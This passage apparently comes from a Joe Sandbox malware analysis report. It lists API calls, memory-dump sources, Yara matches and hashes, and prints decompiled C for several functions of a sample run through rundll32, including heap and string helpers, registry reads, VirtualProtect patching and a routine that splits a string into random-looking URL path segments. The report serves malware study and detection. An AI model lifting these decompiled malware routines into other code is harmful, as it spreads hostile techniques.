                                                          • lstrlen.KERNEL32(00000000), ref: 0628E104
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • strcpy.NTDLL ref: 0628E11B
                                                          • StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 0628E125
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeaplstrlenmemsetstrcpy
                                                          • String ID:
                                                          • API String ID: 528014985-0
                                                          • Opcode ID: 0e1bb228ba7a2beb2c7ccaacf1afceb4c2770878a516c4d8da3146b6d2a4c219
                                                          • Instruction ID: 1a1817aeecd4b0fbd1fb2b69158f2076e1b6773824367e1548b1c524be416ef3
                                                          • Opcode Fuzzy Hash: 0e1bb228ba7a2beb2c7ccaacf1afceb4c2770878a516c4d8da3146b6d2a4c219
                                                          • Instruction Fuzzy Hash: 1821B371921302AFEB906F24DC49B2A77E9BF44722F058419FDE6872C1EB75D844CB62
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D264F Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 78%
                                                          			E036D264F(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E036D6D63(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                                          0x036d265b
                                                          0x036d265f
                                                          0x036d2660
                                                          0x036d2661
                                                          0x036d2663
                                                          0x036d2665
                                                          0x036d2668
                                                          0x036d266d
                                                          0x036d2704
                                                          0x036d270b
                                                          0x036d270b
                                                          0x036d2676
                                                          0x036d267d
                                                          0x036d268d
                                                          0x036d268d
                                                          0x036d2693
                                                          0x036d2695
                                                          0x036d269a
                                                          0x036d26a3
                                                          0x036d26a9
                                                          0x036d26ae
                                                          0x036d26b9
                                                          0x036d26bd
                                                          0x036d26bf
                                                          0x036d26c0
                                                          0x036d26c9
                                                          0x036d26cd
                                                          0x036d26de
                                                          0x036d26cf
                                                          0x036d26d4
                                                          0x036d26d9
                                                          0x036d26e8
                                                          0x036d26e8
                                                          0x036d26bd
                                                          0x036d26ee
                                                          0x036d26f4
                                                          0x036d26f4
                                                          0x036d26fd
                                                          0x036d2702
                                                          0x036d2702
                                                          0x00000000

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FreeSleepStringlstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 1198164300-0
                                                          • Opcode ID: 0ff99225ce1d8659fe4b2280d8a63968f71527e28be0eb0e73a0d0e570e623fd
                                                          • Instruction ID: 3248abc2fe8ff3740742049ee2625295464525a9ffa30c4c545627f00afa4154
                                                          • Opcode Fuzzy Hash: 0ff99225ce1d8659fe4b2280d8a63968f71527e28be0eb0e73a0d0e570e623fd
                                                          • Instruction Fuzzy Hash: 69216D79D01209EFCB11EFA8D99899EBBB8FF48300B1085A9E801E7304EB30DA14CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06272F91 Relevance: 6.1, APIs: 4, Instructions: 75stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.NTDLL ref: 06272FB3
                                                          • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 06272FF7
                                                          • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 0627303A
                                                          • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 0627305D
                                                            • Part of subcall function 0628B9E9: GetTickCount.KERNEL32 ref: 0628B9F9
                                                            • Part of subcall function 0628B9E9: CreateFileW.KERNEL32(06280971,80000000,00000003,0629A1E8,00000003,00000000,00000000,?,06280971,00000000,?,0627C1F8,00000000), ref: 0628BA16
                                                            • Part of subcall function 0628B9E9: GetFileSize.KERNEL32(06280971,00000000,?,00000001,?,06280971,00000000,?,0627C1F8,00000000), ref: 0628BA49
                                                            • Part of subcall function 0628B9E9: CreateFileMappingA.KERNEL32(06280971,0629A1E8,00000002,00000000,00000000,06280971), ref: 0628BA5D
                                                            • Part of subcall function 0628B9E9: lstrlen.KERNEL32(06280971,?,06280971,00000000,?,0627C1F8,00000000), ref: 0628BA79
                                                            • Part of subcall function 0628B9E9: lstrcpy.KERNEL32(?,06280971), ref: 0628BA89
                                                            • Part of subcall function 0628B9E9: HeapFree.KERNEL32(00000000,06280971,?,06280971,00000000,?,0627C1F8,00000000), ref: 0628BAA4
                                                            • Part of subcall function 0628B9E9: CloseHandle.KERNEL32(06280971,?,00000001,?,06280971), ref: 0628BAB6
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleMappinglstrlen$CountFreeHeapOpenSizeTicklstrcpymemset
                                                          • String ID:
                                                          • API String ID: 3239194699-0
                                                          • Opcode ID: 2e010152409e3e9d2864af29fa50695108f1da4870c083dae4342e8fdfcc4956
                                                          • Instruction ID: ce0b81c85f1accb0696ea363ae7b3a9fa6a2c03b5e6bc317af5f30cc9c8e15f3
                                                          • Opcode Fuzzy Hash: 2e010152409e3e9d2864af29fa50695108f1da4870c083dae4342e8fdfcc4956
                                                          • Instruction Fuzzy Hash: 28217C3191021ADFDF61EF65DD48EEEBBB9AF84354F140125FE25A21A0D731C509DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06292968 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(0689C2D0), ref: 0629297E
                                                          • RtlLeaveCriticalSection.NTDLL(0689C2D0), ref: 06292999
                                                          • GetLastError.KERNEL32 ref: 06292A07
                                                          • GetLastError.KERNEL32 ref: 06292A16
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalErrorLastSection$EnterLeave
                                                          • String ID:
                                                          • API String ID: 2124651672-0
                                                          • Opcode ID: dccab7c14f63cd11afbcf76bf9b18935c206d52f3c7693738b1b7b167bbb8ed9
                                                          • Instruction ID: 24e340d80ec3aa5778d9bf830788ed77020baf12c5577aa9dd43dfd027705039
                                                          • Opcode Fuzzy Hash: dccab7c14f63cd11afbcf76bf9b18935c206d52f3c7693738b1b7b167bbb8ed9
                                                          • Instruction Fuzzy Hash: 57214D32921219EFCF12CFA4D908A9E7BB5FF88720F114155FD06A2210C734DA11DFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06277D47 Relevance: 6.1, APIs: 4, Instructions: 70fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0627A698: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,06277D5E), ref: 0627A6BE
                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 06277D99
                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,0627C556,?), ref: 06277DAB
                                                          • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,0627C556,?), ref: 06277DC3
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,0627C556,?), ref: 06277DDE
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleModuleNamePointerRead
                                                          • String ID:
                                                          • API String ID: 1352878660-0
                                                          • Opcode ID: 5ecd2bf70d8cbe14d0d242d461c59f6e187eb4271bb4144b9677e3c0938fda7f
                                                          • Instruction ID: 29340f25f3a26cf224e1e1c72b7a2bc604acbb2abef7067d7814b9d3f535fd3d
                                                          • Opcode Fuzzy Hash: 5ecd2bf70d8cbe14d0d242d461c59f6e187eb4271bb4144b9677e3c0938fda7f
                                                          • Instruction Fuzzy Hash: 62119070A11229BBDF62AAA5DC88EFF7E6DEF42654F100055FA14E1090D3718A40CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06291C9B Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,00000000,76CC8250,76C869A0,?,?,?,062766C0,?,00000000,?), ref: 06291CAB
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,062766C0,?,00000000,?), ref: 06291CCD
                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 06291CF9
                                                          • lstrcatW.KERNEL32(00000000,?), ref: 06291D0C
                                                            • Part of subcall function 0627B83F: strstr.NTDLL ref: 0627B917
                                                            • Part of subcall function 0627B83F: strstr.NTDLL ref: 0627B96A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: strstr$AllocateByteCharHeapMultiWidelstrcatlstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 3712611166-0
                                                          • Opcode ID: ebc3aefbe7197188babb243d2f14743f348185754457bf2fbeba5bc899953870
                                                          • Instruction ID: 5422aab385b44daf3e50bbc3c199a9dca991d279cf78c1d14c3ecb505e9ada68
                                                          • Opcode Fuzzy Hash: ebc3aefbe7197188babb243d2f14743f348185754457bf2fbeba5bc899953870
                                                          • Instruction Fuzzy Hash: D111377291021ABFDF51AFA6DC8CCDE7FADEF492A5B004424FA15A6110D730DA51CBB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627A253 Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(?,?), ref: 0627A28B
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 0627A2A2
                                                          • StrChrA.SHLWAPI(00000000,0000002E), ref: 0627A2AB
                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0627A2C9
                                                            • Part of subcall function 06278C35: VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,?,?,?,?,?,00000000,00000004,?,?,80000000), ref: 06278D0D
                                                            • Part of subcall function 06278C35: VirtualProtect.KERNEL32(?,00000004,?,?,?,?,00000000,00000004,?,?,80000000,00000000,00000001,062960B0,0000001C,0628BE61), ref: 06278D28
                                                            • Part of subcall function 06278C35: RtlEnterCriticalSection.NTDLL(0629A400), ref: 06278D4D
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ProtectVirtual$AllocateCriticalEnterHandleHeapModuleSectionlstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 105881616-0
                                                          • Opcode ID: 775c80e56bc7bd07b34f22bf1764011a5ee482bb3ebb2a93cbb688afdc686d6c
                                                          • Instruction ID: b2774f74672bcf119d76ff1678c0bc81c990937a50114d94e865fab840e5a081
                                                          • Opcode Fuzzy Hash: 775c80e56bc7bd07b34f22bf1764011a5ee482bb3ebb2a93cbb688afdc686d6c
                                                          • Instruction Fuzzy Hash: 05217C30A1030AEFDB51DFA9C849EAEBBF9EF85314F108159E906D7250DB74D981CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06291D47 Relevance: 6.1, APIs: 4, Instructions: 67registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 06291D62
                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 06291D86
                                                          • RegCloseKey.ADVAPI32(?), ref: 06291DDE
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000), ref: 06291DAF
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: QueryValue$AllocateCloseHeapOpen
                                                          • String ID:
                                                          • API String ID: 453107315-0
                                                          • Opcode ID: 786fd85cc7dd797e4ed4f18d075da2bc42eb401db58371e0232ef821fe69398e
                                                          • Instruction ID: 8c385cbfb81db0fd4b5d10372e61c0bf88ca01403384b824a9e2590f2864bb86
                                                          • Opcode Fuzzy Hash: 786fd85cc7dd797e4ed4f18d075da2bc42eb401db58371e0232ef821fe69398e
                                                          • Instruction Fuzzy Hash: 652106B991010DFFDF01DF99DC888EEBBBDEF89350F208456E901A6210E3719A90DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D4162 Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 68%
                                                          			E036D4162(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x36da2d8, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x36da2f0; // 0x8c8786d1
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x36da2f0 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                                          0x036d416a
                                                          0x036d416d
                                                          0x036d4173
                                                          0x036d418b
                                                          0x036d418d
                                                          0x036d4192
                                                          0x036d4194
                                                          0x036d4197
                                                          0x036d4199
                                                          0x036d419c
                                                          0x036d419e
                                                          0x036d419e
                                                          0x036d41a0
                                                          0x036d41ab
                                                          0x036d41b0
                                                          0x036d41c1
                                                          0x036d41c9
                                                          0x036d41ce
                                                          0x036d41d1
                                                          0x036d41d4
                                                          0x036d41d6
                                                          0x036d41d9
                                                          0x036d41dc
                                                          0x036d41dc
                                                          0x036d41df
                                                          0x036d41ea
                                                          0x036d41ef
                                                          0x036d41f9

                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,036D1DC6,00000000,?,75BCC740,036D58D7,00000000,059695B0), ref: 036D416D
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 036D4185
                                                          • memcpy.NTDLL(00000000,059695B0,-00000008,?,?,?,036D1DC6,00000000,?,75BCC740,036D58D7,00000000,059695B0), ref: 036D41C9
                                                          • memcpy.NTDLL(00000001,059695B0,00000001,036D58D7,00000000,059695B0), ref: 036D41EA
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memcpy$AllocateHeaplstrlen
                                                          • String ID:
                                                          • API String ID: 1819133394-0
                                                          • Opcode ID: c2b726df45cf4c7e8da8f1221c6643594c62e35a89ae040340fae9c8277eaad8
                                                          • Instruction ID: 139dd87cb71c6de18b1e4834fe2c28269e6aa9dc1cfb3efb443b543a3e8caf5d
                                                          • Opcode Fuzzy Hash: c2b726df45cf4c7e8da8f1221c6643594c62e35a89ae040340fae9c8277eaad8
                                                          • Instruction Fuzzy Hash: BD113A72E00215BFC710CE6BEC84D9A7FEAEB80250B090179F404C7240EB718E148790
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627263B Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0628EAA8,00000000,?,00000000,0627E842,00000000,0689C310), ref: 06272646
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0627265E
                                                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,0628EAA8,00000000,?,00000000,0627E842,00000000,0689C310), ref: 062726A2
                                                          • memcpy.NTDLL(00000001,?,00000001,?,?,?), ref: 062726C3
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: memcpy$AllocateHeaplstrlen
                                                          • String ID:
                                                          • API String ID: 1819133394-0
                                                          • Opcode ID: 8179d61eadf7602b83a9e857db0bcee5e872e7b1978d974080db1f8ec4cbbea9
                                                          • Instruction ID: 37229cafeca0adf876f2f9a9d842b3589917b1cf2833264438c289ef882aeb27
                                                          • Opcode Fuzzy Hash: 8179d61eadf7602b83a9e857db0bcee5e872e7b1978d974080db1f8ec4cbbea9
                                                          • Instruction Fuzzy Hash: 2F11C672A00216EFC7508F69EC88E9EBBEEDFD5250B054176E904D7251E6719E048BB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 062821FE Relevance: 6.1, APIs: 4, Instructions: 58threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GlobalFix.KERNEL32(00000000), ref: 0628223E
                                                          • memset.NTDLL ref: 06282252
                                                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 0628225F
                                                            • Part of subcall function 0628C563: OpenProcess.KERNEL32(00000410,B8F475FF,06282289,00000000,00000000,06282289,0000001C,00000000,00000000,?,?,?,06282289), ref: 0628C5BD
                                                            • Part of subcall function 0628C563: CloseHandle.KERNEL32(00000000,00000000,00000000,06282299,00000104,?,?,?,06282289), ref: 0628C5DB
                                                            • Part of subcall function 0628C563: GetSystemTimeAsFileTime.KERNEL32(06282289), ref: 0628C643
                                                          • GlobalUnWire.KERNEL32(00000000), ref: 0628228A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: GlobalProcessTime$CloseFileHandleOpenSystemThreadWindowWirememset
                                                          • String ID:
                                                          • API String ID: 3286078456-0
                                                          • Opcode ID: 118dcec61c91091d2dad06d13bd5cbca308de6e0e43b291bff8aecbbfdd51433
                                                          • Instruction ID: 3843b4c163b588f1348a44e5240c8a69192df564086bb1fef2ec616b5af69740
                                                          • Opcode Fuzzy Hash: 118dcec61c91091d2dad06d13bd5cbca308de6e0e43b291bff8aecbbfdd51433
                                                          • Instruction Fuzzy Hash: E6114F75E11305AFDB51BBB5AC8DB9E77B9AB48611F04411AEA05F1380DB758600CEB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06291C1F Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000001,?,?,?,0627AE46,00000000,00000000), ref: 06291C3D
                                                          • GetLastError.KERNEL32(?,?,?,0627AE46,00000000,00000000,00000000,00000000,0000001E,0000001E,?,?,?,0627EBC1,?,0000001E), ref: 06291C45
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharErrorLastMultiWide
                                                          • String ID:
                                                          • API String ID: 203985260-0
                                                          • Opcode ID: befd4a2ad3f444c49aac2c099ef2cf91d2eb30c87e003b86f0e290e5c47210fd
                                                          • Instruction ID: 800533d5d1c6455755e83a1f68e93210c7799634c028c114c5922c62cb8d745c
                                                          • Opcode Fuzzy Hash: befd4a2ad3f444c49aac2c099ef2cf91d2eb30c87e003b86f0e290e5c47210fd
                                                          • Instruction Fuzzy Hash: 7B01FC316183527F9B71AA739C4CD6BBB6DEBCA770B100B29FD65921C0D7304810C6B1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 062727E0 Relevance: 6.1, APIs: 4, Instructions: 56stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(?,?,?,00000000,?,?,06271D09,?,?,?,?,?,?,?,?,?), ref: 062727F4
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • mbstowcs.NTDLL ref: 0627280E
                                                          • lstrlen.KERNEL32(?), ref: 06272819
                                                          • mbstowcs.NTDLL ref: 06272833
                                                            • Part of subcall function 0628BAD1: lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 0628BB1D
                                                            • Part of subcall function 0628BAD1: lstrlenW.KERNEL32(?,?,00000000), ref: 0628BB29
                                                            • Part of subcall function 0628BAD1: memset.NTDLL ref: 0628BB71
                                                            • Part of subcall function 0628BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0628BB8C
                                                            • Part of subcall function 0628BAD1: lstrlenW.KERNEL32(0000002C), ref: 0628BBC4
                                                            • Part of subcall function 0628BAD1: lstrlenW.KERNEL32(?), ref: 0628BBCC
                                                            • Part of subcall function 0628BAD1: memset.NTDLL ref: 0628BBEF
                                                            • Part of subcall function 0628BAD1: wcscpy.NTDLL ref: 0628BC01
                                                            • Part of subcall function 0628E803: RtlFreeHeap.NTDLL(00000000,?,06283953,?,?,0628BF5B,00000000,00000000,062710B0,00000000,06299F2C,00000008,00000003), ref: 0628E80F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrlen$Heapmbstowcsmemset$AllocateFileFindFirstFreewcscpy
                                                          • String ID:
                                                          • API String ID: 1961997177-0
                                                          • Opcode ID: ddb5c1a3f46c44c602aefd7d5de734081cfd467e92ce7e25ef1bdee260a1ea77
                                                          • Instruction ID: dfe77bba25399b34edfd85f9c0d58c560c8e76a6ec9020442245a1779eafcdfa
                                                          • Opcode Fuzzy Hash: ddb5c1a3f46c44c602aefd7d5de734081cfd467e92ce7e25ef1bdee260a1ea77
                                                          • Instruction Fuzzy Hash: 5901F173911314BBEF91BBA58C88F8F7BADEF84250F144029FD14A6140EA71DA00C7A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06271B71 Relevance: 6.1, APIs: 4, Instructions: 54memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(?), ref: 06271B7E
                                                          • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 06271BA4
                                                          • lstrcpy.KERNEL32(00000014,?), ref: 06271BC9
                                                          • memcpy.NTDLL(?,?,?), ref: 06271BD6
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeaplstrcpylstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 1388643974-0
                                                          • Opcode ID: ec0e107928db07b6a6a39919dfbe1ad5a0d233ab48733bb407ed7c35213ca1a2
                                                          • Instruction ID: 6f86e8a2fbab8c72acd9acd6e708def0705a9fe67eb25fc3138301f8cb8f864b
                                                          • Opcode Fuzzy Hash: ec0e107928db07b6a6a39919dfbe1ad5a0d233ab48733bb407ed7c35213ca1a2
                                                          • Instruction Fuzzy Hash: 2D11377191030AEFC721CF58E848E9ABBF9EF49704F14855AF95997210D771E914CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628E03B Relevance: 6.1, APIs: 4, Instructions: 54memorystringtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,06280D10,?,00000000,00000000), ref: 0628E04E
                                                          • lstrlen.KERNEL32(0689C178,?,06280D10,?,00000000,00000000), ref: 0628E06F
                                                          • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 0628E087
                                                          • lstrcpy.KERNEL32(00000000,0689C178), ref: 0628E099
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 1929783139-0
                                                          • Opcode ID: dfe196441ef800c98f93bd20d30e0ebb958d58c7a970e6ed62b87351c9ab585b
